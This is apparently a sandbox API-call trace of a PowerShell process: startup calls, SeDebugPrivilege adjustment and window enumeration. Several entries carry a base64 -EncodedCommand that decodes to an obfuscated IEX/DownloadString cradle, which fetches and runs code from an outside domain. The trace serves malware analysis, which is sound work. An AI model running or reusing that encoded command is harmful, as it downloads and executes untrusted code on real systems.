	[0329.961] CoTaskMemAlloc (cb=0x3b) returned 0x1b6e8c70
	[0330.486] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c72ded8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c72ded8) returned 0x4550
	[0330.487] CoTaskMemFree (pv=0x1b6e8c70) 
	[0330.490] GetConsoleWindow () returned 0x201e4
	[0330.497] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0330.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.497] CoTaskMemFree (pv=0x2ca610) 
	[0330.498] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0330.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.498] CoTaskMemFree (pv=0x2ca610) 
	[0330.504] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0330.504] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.504] CoTaskMemFree (pv=0x2ca610) 
	[0330.506] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c72df20 | out: pNumArgs=0x1c72df20) returned 0x1b6fec60*=""
	[0330.507] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.508] CoTaskMemAlloc (cb=0x22) returned 0x1b6fd9b0
	[0330.508] RtlMoveMemory (in: Destination=0x1b6fd9b0, Source=0x1b6fec82, Length=0x20 | out: Destination=0x1b6fd9b0) 
	[0330.508] CoTaskMemFree (pv=0x1b6fd9b0) 
	[0330.508] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.508] CoTaskMemAlloc (cb=0x2f4) returned 0x1b6d6f90
	[0330.508] RtlMoveMemory (in: Destination=0x1b6d6f90, Source=0x1b6feca2, Length=0x2f2 | out: Destination=0x1b6d6f90) 
	[0330.508] CoTaskMemFree (pv=0x1b6d6f90) 
	[0330.509] LocalFree (hMem=0x1b6fec60) returned 0x0
	[0331.177] CoTaskMemAlloc (cb=0x804) returned 0x1b6f51e0
	[0331.177] GetConsoleTitleW (in: lpConsoleTitle=0x1b6f51e0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.178] CoTaskMemFree (pv=0x1b6f51e0) 
	[0331.214] CoTaskMemAlloc (cb=0x38e) returned 0x1b6d6f90
	[0331.214] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c72de80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3004f38 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x3004f38*(hProcess=0x36c, hThread=0x368, dwProcessId=0xf20, dwThreadId=0xf24)) returned 1
	[0331.493] CoTaskMemFree (pv=0x1b6d6f90) 
	[0331.494] CloseHandle (hObject=0x368) returned 1
	[0331.494] CoTaskMemAlloc (cb=0x3b) returned 0x1b6e8c70
	[0331.494] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c72df28, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c72df28) returned 0x4550
	[0331.495] CoTaskMemFree (pv=0x1b6e8c70) 
	[0332.365] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.365] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.366] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c72e008, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c72e008*=0x368) returned 1

Process:
	id = "5"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x34604000"
	os_pid = "0x804"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 31
	os_tid = 0x810

	[0241.241] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0242.057] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.057] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.057] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0242.057] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0245.515] GetVersionExW (in: lpVersionInformation=0x26dc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.939] GetVersionExW (in: lpVersionInformation=0x26dc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.950] GetVersionExW (in: lpVersionInformation=0x26d970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.951] SetErrorMode (uMode=0x1) returned 0x1
	[0245.952] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dad0 | out: lpFileInformation=0x26dad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0245.953] SetErrorMode (uMode=0x1) returned 0x1
	[0245.955] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dd40 | out: lpdwHandle=0x26dd40) returned 0x94c
	[0245.957] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf72d8 | out: lpData=0x2cf72d8) returned 1
	[0245.959] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2cf7374, puLen=0x26dcb0) returned 1
	[0245.961] lstrlenW (lpString="䅁") returned 1
	[0245.968] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf7450, puLen=0x26dc20) returned 1
	[0245.969] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0245.971] CoTaskMemAlloc (cb=0x2e) returned 0x51c1a0
	[0245.971] lstrcpyW (in: lpString1=0x51c1a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0245.972] CoTaskMemFree (pv=0x51c1a0) 
	[0245.972] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf74a4, puLen=0x26dc20) returned 1
	[0245.972] lstrlenW (lpString="System.Management.Automation") returned 28
	[0245.972] CoTaskMemAlloc (cb=0x3c) returned 0x5167b0
	[0245.972] lstrcpyW (in: lpString1=0x5167b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0245.972] CoTaskMemFree (pv=0x5167b0) 
	[0245.972] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf7500, puLen=0x26dc20) returned 1
	[0245.972] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0245.972] CoTaskMemAlloc (cb=0x20) returned 0x515200
	[0245.972] lstrcpyW (in: lpString1=0x515200, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0245.972] CoTaskMemFree (pv=0x515200) 
	[0245.972] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf7540, puLen=0x26dc20) returned 1
	[0245.972] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0245.972] CoTaskMemAlloc (cb=0x44) returned 0x5167b0
	[0245.972] lstrcpyW (in: lpString1=0x5167b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0245.972] CoTaskMemFree (pv=0x5167b0) 
	[0245.972] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf75a8, puLen=0x26dc20) returned 1
	[0245.972] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0245.972] CoTaskMemAlloc (cb=0x76) returned 0x4c1350
	[0245.972] lstrcpyW (in: lpString1=0x4c1350, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0245.972] CoTaskMemFree (pv=0x4c1350) 
	[0245.972] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf7644, puLen=0x26dc20) returned 1
	[0245.973] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0245.973] CoTaskMemAlloc (cb=0x44) returned 0x5167b0
	[0245.973] lstrcpyW (in: lpString1=0x5167b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0245.973] CoTaskMemFree (pv=0x5167b0) 
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf76a8, puLen=0x26dc20) returned 1
	[0245.973] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0245.973] CoTaskMemAlloc (cb=0x58) returned 0x4e7a30
	[0245.973] lstrcpyW (in: lpString1=0x4e7a30, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0245.973] CoTaskMemFree (pv=0x4e7a30) 
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf7724, puLen=0x26dc20) returned 1
	[0245.973] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0245.973] CoTaskMemAlloc (cb=0x20) returned 0x515200
	[0245.973] lstrcpyW (in: lpString1=0x515200, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0245.973] CoTaskMemFree (pv=0x515200) 
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x2cf73cc, puLen=0x26dc20) returned 1
	[0245.973] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0245.973] CoTaskMemAlloc (cb=0x66) returned 0x51a900
	[0245.973] lstrcpyW (in: lpString1=0x51a900, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0245.973] CoTaskMemFree (pv=0x51a900) 
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x0, puLen=0x26dc20) returned 0
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x0, puLen=0x26dc20) returned 0
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dc28, puLen=0x26dc20 | out: lplpBuffer=0x26dc28*=0x0, puLen=0x26dc20) returned 0
	[0245.973] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dbf8, puLen=0x26dbf0 | out: lplpBuffer=0x26dbf8*=0x2cf7374, puLen=0x26dbf0) returned 1
	[0245.974] CoTaskMemAlloc (cb=0x204) returned 0x4c3ce0
	[0245.974] VerLanguageNameW (in: wLang=0x0, szLang=0x4c3ce0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0245.975] CoTaskMemFree (pv=0x4c3ce0) 
	[0245.975] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\", lplpBuffer=0x26dc48, puLen=0x26dc40 | out: lplpBuffer=0x26dc48*=0x2cf7300, puLen=0x26dc40) returned 1
	[0245.981] GetCurrentProcessId () returned 0x804
	[0246.416] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26cb70 | out: lpLuid=0x26cb70*(LowPart=0x14, HighPart=0)) returned 1
	[0246.418] GetCurrentProcess () returned 0xffffffffffffffff
	[0246.419] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cb90 | out: TokenHandle=0x26cb90*=0x2e8) returned 1
	[0246.419] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2cfab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0246.421] CloseHandle (hObject=0x2e8) returned 1
	[0246.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x2e8
	[0246.432] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2cfabb8, cb=0x200, lpcbNeeded=0x26dba8 | out: lphModule=0x2cfabb8, lpcbNeeded=0x26dba8) returned 1
	[0246.434] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2cfae28, cb=0x18 | out: lpmodinfo=0x2cfae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0246.435] CoTaskMemAlloc (cb=0x804) returned 0x5246e0
	[0246.435] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x5246e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0246.435] CoTaskMemFree (pv=0x5246e0) 
	[0246.435] CoTaskMemAlloc (cb=0x804) returned 0x5246e0
	[0246.435] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x5246e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0246.436] CoTaskMemFree (pv=0x5246e0) 
	[0246.436] CloseHandle (hObject=0x2e8) returned 1
	[0246.443] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x804) returned 0x2e8
	[0246.444] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x26dcd8 | out: lpExitCode=0x26dcd8*=0x103) returned 1
	[0246.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb088, Length=0x20000, ResultLength=0x26dca0 | out: SystemInformation=0x12cfb088, ResultLength=0x26dca0*=0xf4a0) returned 0x0
	[0246.897] EnumWindows (lpEnumFunc=0x2be66ac, lParam=0x0) returned 1
	[0248.388] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0248.808] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x558
	[0249.088] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.088] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.088] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.088] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x538
	[0249.088] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x778
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x778
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x460
	[0249.089] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xa04
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x924
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x8dc
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x7dc
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x768
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x764
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x820
	[0249.090] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x810
	[0249.091] GetWindow (hWnd=0x201c6, uCmd=0x4) returned 0x0
	[0249.092] IsWindowVisible (hWnd=0x201c6) returned 0
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x794
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x83c
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x7ac
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb44
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0xb5c
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x838
	[0249.092] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26da00 | out: lpdwProcessId=0x26da00) returned 0x4d0
